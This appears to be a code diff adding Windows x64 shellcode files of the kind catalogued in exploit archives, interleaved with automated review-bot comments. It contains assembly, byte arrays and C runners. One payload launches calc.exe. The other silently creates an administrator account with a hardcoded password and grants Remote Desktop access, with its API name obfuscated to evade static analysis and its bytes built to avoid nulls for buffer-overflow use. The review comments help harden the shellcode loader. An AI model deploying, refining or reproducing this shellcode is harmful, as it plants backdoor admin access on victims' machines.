+; Get the address of the API from the Kernel32.dll ExportTable
+getapiaddr:
+pop rbx ; save the return address for ret 2 caller after API address is found
+pop rcx ; Get the string length counter from stack
+xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
+mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
+push rcx ; push the string length counter to stack
+loop:
+mov rcx, [rsp] ; reset the string length counter from the stack
+xor rdi,rdi ; Clear RDI for setting up string name retrieval
+mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
+add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
+mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
+repe cmpsb ; Compare strings at RDI & RSI
+je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
+incloop:
+inc rax
+jmp short loop
+
+; Find the address of GetProcAddress by using the last value of the Counter
+resolveaddr:
+pop rcx ; remove string length counter from top of stack
+mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.
+mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
+add rax, r8 ; RAX = Kernel32. = RVA kernel32. + kernel32.dll BaseAddress
+push rbx ; place the return address from the api string call back on the top of the stack
+ret ; return to API caller
+
+apis: ; API Names to resolve addresses
+; WinExec | String length : 7
+xor rcx, rcx
+add cl, 0x7 ; String length for compare string
+mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
+not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
+shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll
+push rax
+push rcx ; push the string length counter to stack
+call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
+mov r14, rax ; R14 = Kernel32.WinExec Address
+
+; UINT WinExec(
+; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0
+; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL
+; );
+xor rcx, rcx
+mul rcx ; RAX & RDX & RCX = 0x0
+; calc.exe | String length : 8
+push rax ; Null terminate string on stack
+mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
+not rax
+;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
+push rax ; RSP = "calc.exe",0x0
+mov rcx, rsp ; RCX = "calc.exe",0x0
+inc rdx ; RDX = 0x1 = SW_SHOWNORMAL
+sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
+call r14 ; Call WinExec("calc.exe", SW_HIDE)
+
+
+###########################################################################################################################################
+
+// runShellcode.c
+// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
+#include
+void main() {
+ void* exec;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+ // Shellcode
+ unsigned char payload[] =
+ "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
+ "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
+ "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
+ "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
+ "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
+ "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
+ "\x48\x83\xec\x20\x41\xff\xd6";
+ unsigned int payload_len = 205;
+ exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ RtlMoveMemory(exec, payload, payload_len);
+ rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+}
\ No newline at end of file
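Review bot: The comment on the final `call r14` reads `Call WinExec("calc.exe", SW_HIDE)` but `inc rdx` sets RDX = 1, which the prototype comment above it labels `SW_SHOWNORMAL`; change it to `; Call WinExec("calc.exe", SW_SHOWNORMAL)`. The `#include` line in runShellcode.c has lost its header name and needs `#include <windows.h>` for `VirtualAlloc`, `VirtualProtect`, `RtlMoveMemory` and `CreateThread` to resolve. The runner ignores failures — `exec` is never checked for NULL and `rv` is assigned but never tested — so a failed allocation or protection change sends `CreateThread` into NULL or non-executable memory; `if (!exec || !VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect)) return;` covers both. Two assumptions deserve a line in the header: the loader walk takes the third `InInitializationOrderModuleList` entry as kernel32.dll, which holds on the tested Windows 10 build but is not guaranteed across versions, and `repe cmpsb` with a 7-byte count matches any export whose name merely starts with `WinExec`, since the terminating NUL is not compared.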
diff --git a/shellcodes/windows_x86-64/49820.c b/shellcodes/windows_x86-64/49820.c
new file mode 100644
index 000000000..28bddb1f2
--- /dev/null
+++ b/shellcodes/windows_x86-64/49820.c
@@ -0,0 +1,193 @@
+# Shellcode Title: Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
+# Shellcode Author: Bobby Cooke (boku)
+# Date: 02/05/2021
+# Tested on: Windows 10 v2004 (x64)
+# Compiled from: Kali Linux (x86_64)
+# Full Disclosure: github.com/boku7/x64win-AddRdpAdminShellcode
+# Shellcode Description:
+# 64bit Windows 10 shellcode that adds user BOKU:SP3C1ALM0V3 to the system and the localgroups
+# Administrators & "Remote Desktop Users". Position Independent Code (PIC) that dynamically resolves
+# KERNEL32 DLL via PEB & LDR. Shellcode contains no null bytes, and therefor can be used on typical
+# stack based Buffer OverFlow vulnerabilities. Shellcode must be executed from a process with either
+# a HIGH or SYSTEM integrity level.
+
+; nasm -f win64 addRdpAdmin.asm -o addRdpAdmin.o
+; for i in $(objdump -D addRdpAdmin.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
+; Get kernel32.dll base address
+xor rdi, rdi ; RDI = 0x0
+mul rdi ; RAX&RDX =0x0
+mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
+mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
+mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
+mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
+mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
+mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
+mov r8, rbx ; RBX & R8 = &kernel32.dll
+
+; Get kernel32.dll ExportTable Address
+mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
+add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
+xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
+add cx, 0x88ff
+shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
+mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
+add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
+
+; Get &AddressTable from Kernel32.dll ExportTable
+xor r10, r10
+mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
+add r10, r8 ; R10 = &AddressTable
+
+; Get &NamePointerTable from Kernel32.dll ExportTable
+xor r11, r11
+mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
+add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
+
+; Get &OrdinalTable from Kernel32.dll ExportTable
+xor r12, r12
+mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
+add r12, r8 ; R12 = &OrdinalTable
+
+jmp short apis
+
+; Get the address of the API from the Kernel32.dll ExportTable
+getapiaddr:
+pop rbx ; save the return address for ret 2 caller after API address is found
+pop rcx ; Get the string length counter from stack
+xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
+mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
+push rcx ; push the string length counter to stack
+loop:
+mov rcx, [rsp] ; reset the string length counter from the stack
+xor rdi,rdi ; Clear RDI for setting up string name retrieval
+mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
+add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
+mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
+repe cmpsb ; Compare strings at RDI & RSI
+je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
+incloop:
+inc rax
+jmp short loop
+
+; Find the address of GetProcAddress by using the last value of the Counter
+resolveaddr:
+pop rcx ; remove string length counter from top of stack
+mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.
+mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
+add rax, r8 ; RAX = Kernel32. = RVA kernel32. + kernel32.dll BaseAddress
+push rbx ; place the return address from the api string call back on the top of the stack
+ret ; return to API caller
+
+apis: ; API Names to resolve addresses
+; WinExec | String length : 7
+xor rcx, rcx
+add cl, 0x7 ; String length for compare string
+mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
+not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
+shr rax, 0x8 ; cexEniW,0xF0 --> 0x00,cexEniW
+push rax
+push rcx ; push the string length counter to stack
+call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
+mov r14, rax ; R14 = Kernel32.WinExec Address
+
+jmp short command
+
+WinExec:
+; UINT WinExec(
+; LPCSTR lpCmdLine, => RCX = + 0x00 (Null Terminated)
+; UINT uCmdShow => RDX = 0x0 = SW_HIDE
+; );
+xor rdx, rdx ; RDX = 0x0 = SW_HIDE
+sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
+call r14 ; Call WinExec(, SW_HIDE)
+add rsp, 0x20 ; Fix stack
+ret
+
+command:
+; WinExec("cmd.exe /c net user BOKU SP3C1ALM0V3 /add && net localgroup Administrators BOKU /add && net localgroup \"Remote Desktop Users\" BOKU /add", 0x0);
+; 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 75 cmd.exe /c net u
+; 73 65 72 20 42 4F 4B 55 20 53 50 33 43 31 41 4C ser BOKU SP3C1AL
+; 4D 30 56 33 20 2F 61 64 64 20 26 26 20 6E 65 74 M0V3 /add && net
+; 20 6C 6F 63 61 6C 67 72 6F 75 70 20 41 64 6D 69 localgroup Admi
+; 6E 69 73 74 72 61 74 6F 72 73 20 42 4F 4B 55 20 nistrators BOKU
+; 2F 61 64 64 20 26 26 20 6E 65 74 20 6C 6F 63 61 /add && net loca
+; 6C 67 72 6F 75 70 20 22 52 65 6D 6F 74 65 20 44 lgroup "Remote D
+; 65 73 6B 74 6F 70 20 55 73 65 72 73 22 20 42 4F esktop Users" BO
+; 4B 55 20 2F 61 64 64 00 KU /add.
+; String length : 135
+mov rax, 0x6464612f20554bFF ; dda/ UK : 6464612f20554b
+shr rax, 0x8
+push rax
+mov rax, 0x4f42202273726573 ; OB "sres : 4f42202273726573
+push rax
+mov rax, 0x5520706f746b7365 ; U potkse : 5520706f746b7365
+push rax
+mov rax, 0x442065746f6d6552 ; D etomeR : 442065746f6d6552
+push rax
+mov rax, 0x222070756f72676c ; " puorgl : 222070756f72676c
+push rax
+mov rax, 0x61636f6c2074656e ; acol ten : 61636f6c2074656e
+push rax
+mov rax, 0x202626206464612f ; && dda/ : 202626206464612f
+push rax
+mov rax, 0x20554b4f42207372 ; UKOB sr : 20554b4f42207372
+push rax
+mov rax, 0x6f7461727473696e ; otartsin : 6f7461727473696e
+push rax
+mov rax, 0x696d64412070756f ; imdA puo : 696d64412070756f
+push rax
+mov rax, 0x72676c61636f6c20 ; rglacol : 72676c61636f6c20
+push rax
+mov rax, 0x74656e2026262064 ; ten && d : 74656e2026262064
+push rax
+mov rax, 0x64612f203356304d ; da/ 3V0M : 64612f203356304d
+push rax
+mov rax, 0x4c41314333505320 ; LA1C3PS : 4c41314333505320
+push rax
+mov rax, 0x554b4f4220726573 ; UKOB res : 554b4f4220726573
+push rax
+mov rax, 0x752074656e20632f ; u ten c/ : 752074656e20632f
+push rax
+mov rax, 0x206578652e646d63 ; exe.dmc : 206578652e646d63
+push rax
+mov rcx, rsp ; RCX = ,0x0
+call WinExec
+
+###########################################################################################################################################
+
+#include
+// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
+int main(void) {
+ void* exec_mem;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+
+ unsigned char payload[] =
+ "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49"
+ "\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44"
+ "\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59"
+ "\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff"
+ "\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91"
+ "\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0\xff\xff\xff\x49\x89\xc6\xeb\x0f\x48\x31\xd2\x48\x83\xec\x20"
+ "\x41\xff\xd6\x48\x83\xc4\x20\xc3\x48\xb8\xff\x4b\x55\x20\x2f\x61\x64\x64\x48\xc1\xe8\x08\x50\x48\xb8\x73\x65\x72\x73\x22"
+ "\x20\x42\x4f\x50\x48\xb8\x65\x73\x6b\x74\x6f\x70\x20\x55\x50\x48\xb8\x52\x65\x6d\x6f\x74\x65\x20\x44\x50\x48\xb8\x6c\x67"
+ "\x72\x6f\x75\x70\x20\x22\x50\x48\xb8\x6e\x65\x74\x20\x6c\x6f\x63\x61\x50\x48\xb8\x2f\x61\x64\x64\x20\x26\x26\x20\x50\x48"
+ "\xb8\x72\x73\x20\x42\x4f\x4b\x55\x20\x50\x48\xb8\x6e\x69\x73\x74\x72\x61\x74\x6f\x50\x48\xb8\x6f\x75\x70\x20\x41\x64\x6d"
+ "\x69\x50\x48\xb8\x20\x6c\x6f\x63\x61\x6c\x67\x72\x50\x48\xb8\x64\x20\x26\x26\x20\x6e\x65\x74\x50\x48\xb8\x4d\x30\x56\x33"
+ "\x20\x2f\x61\x64\x50\x48\xb8\x20\x53\x50\x33\x43\x31\x41\x4c\x50\x48\xb8\x73\x65\x72\x20\x42\x4f\x4b\x55\x50\x48\xb8\x2f"
+ "\x63\x20\x6e\x65\x74\x20\x75\x50\x48\xb8\x63\x6d\x64\x2e\x65\x78\x65\x20\x50\x48\x89\xe1\xe8\x2a\xff\xff\xff";
+ unsigned int payload_len = 387;
+
+ exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ // Copy payload to new buffer
+ RtlMoveMemory(exec_mem, payload, payload_len);
+ // Make new buffer as executable
+ rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+ // If all good, run the payload
+ if (rv != 0) {
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+ }
+ return 0;
+}
\ No newline at end of file
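Review bot: The harness `int main(void)` at L933 does not compile as shown, because the `#include` on L931 carries no header name — presumably `<windows.h>` was dropped by the same extraction that emptied the comments on L870, L875 and L926, where the command-string text is missing. `CreateThread` on L962 can return NULL and `WaitForSingleObject(th, -1)` receives it unchecked; the `VirtualAlloc` result on L955 is likewise used without a NULL check, neither the thread handle nor the allocation is released, and `-1` is clearer written as `INFINITE`. The rewritten tail below adds those checks and the cleanup; the payload array and `payload_len` are unchanged. The same missing header name appears in the harness at the end of the preceding file in this commit.
```c
#include <windows.h>
// … unchanged: payload[] and payload_len …
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (exec_mem == NULL) {
        return 1;
    }
    RtlMoveMemory(exec_mem, payload, payload_len);
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    if (rv != 0) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
        if (th != NULL) {
            WaitForSingleObject(th, INFINITE);
            CloseHandle(th);
        }
    }
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
```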